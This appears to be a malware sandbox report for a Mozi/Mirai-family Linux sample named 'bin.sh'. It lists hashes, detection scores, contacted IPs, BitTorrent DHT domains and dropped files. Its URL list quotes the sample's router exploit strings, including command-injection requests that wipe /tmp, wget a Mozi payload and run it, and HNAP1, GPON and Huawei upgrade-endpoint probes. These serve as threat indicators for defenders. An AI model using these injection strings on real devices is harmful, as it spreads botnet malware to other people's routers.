bin.sh

Status: finished

Submission Time: 2021-01-26 00:23:34 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
344095
API (Web) ID:
590088
Analysis Started:

2021-01-26 00:23:34 +01:00
Analysis Finished:

2021-01-26 00:34:15 +01:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 40/62

Open Full Report

malicious

Score: 19/36

malicious

Score: 19/28

malicious

IPs

IP	Country	Detection
111.185.181.169	Taiwan; Republic of China (ROC)
97.75.153.94	United States
183.168.111.212	China
Click to see the 97 hidden entries
74.224.191.111	United States
58.98.0.84	Japan
26.20.176.82	United States
29.54.98.88	United States
190.216.209.174	Argentina
78.239.138.225	France
172.138.55.56	United States
18.83.153.48	United States
37.26.220.89	Norway
206.116.81.106	Canada
194.189.0.209	United Kingdom
151.44.94.207	Italy
157.52.50.34	United States
157.116.228.108	Japan
86.100.251.184	Lithuania
153.158.34.130	Japan
157.194.246.3	United States
37.145.1.63	Russian Federation
174.248.113.180	United States
91.68.153.140	France
103.4.42.175	Japan
66.131.172.140	Canada
165.69.88.89	Australia
44.134.174.174	United States
96.227.126.40	United States
87.197.254.225	Slovakia (SLOVAK Republic)
217.142.216.81	Sweden
182.23.203.242	China
5.14.105.137	Romania
125.134.6.76	Korea Republic of
98.101.97.159	United States
215.93.198.247	United States
207.6.190.120	Canada
202.144.169.171	Australia
45.148.96.51	Netherlands
104.208.243.62	United States
106.187.85.86	Japan
110.72.210.139	China
163.212.48.150	Japan
59.18.131.116	Korea Republic of
160.118.8.178	South Africa
133.4.40.28	Japan
222.240.82.124	China
192.19.254.53	United States
18.210.13.68	United States
111.224.91.153	China
24.78.103.243	Canada
57.99.238.88	Belgium
61.77.98.141	Korea Republic of
114.3.158.246	Indonesia
58.222.87.135	China
192.79.67.208	United States
4.0.19.168	United States
170.79.55.160	Brazil
99.147.205.5	United States
221.65.136.75	Japan
201.233.149.101	Colombia
171.131.146.1	United States
176.248.82.68	United Kingdom
135.53.228.40	United States
223.155.36.174	China
33.216.73.164	United States
170.109.123.136	United States
154.45.216.205	United States
147.200.251.34	Australia
159.204.183.75	United States
201.8.221.107	Brazil
88.1.239.79	Spain
91.76.37.43	Russian Federation
160.157.215.58	Tunisia
167.151.41.249	United States
169.109.182.90	United States
170.108.229.35	United States
119.18.79.138	Korea Republic of
169.173.126.123	United States
105.25.217.164	Mauritius
105.196.8.55	Egypt
81.54.152.81	France
3.110.190.131	United States
137.32.169.4	United States
197.204.152.220	Algeria
117.60.217.40	China
6.202.86.157	United States
112.197.177.142	Viet Nam
136.17.125.150	United States
134.247.139.110	Germany
112.234.3.209	China
207.168.147.166	United States
40.77.4.165	United States
148.144.86.87	United States
187.178.106.53	Mexico
214.128.251.204	United States
93.220.218.152	Germany
172.95.177.246	United States
58.77.57.138	Korea Republic of
5.139.220.125	Russian Federation
84.37.51.95	France

Domains

Name	IP	Detection
dht.transmissionbt.com	87.98.162.88
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://190.166.164.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://52.64.147.225:80/HNAP1/
http://173.223.142.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 40 hidden entries
http://176.122.182.151:80/HNAP1/
http://%s:%d/bin.sh
http://172.252.124.171:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://85.153.79.234:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://85.95.252.164:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.17.98.63:80/HNAP1/
http://104.73.19.166:80/HNAP1/
http://184.27.52.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://52.201.62.234:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://68.233.196.110:80/HNAP1/
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://222.236.20.88:49152/soap.cgi?service=WANIPConn1
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/Mozi.m;
http://www.alsa-project.org.
http://HTTP/1.1
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://schemas.xmlsoap.org/soap/envelope//
http://www.alsa-project.org
http://pastebin.ca)
http://%s:%d/Mozi.a;chmod
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://ipinfo.io/ip
http://www.pastebin.ca/upload.php
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1sendcmd
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://13.235.141.230:37215/ctrlt/DeviceUpgrade_1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

bin.sh

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

bin.sh Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

bin.sh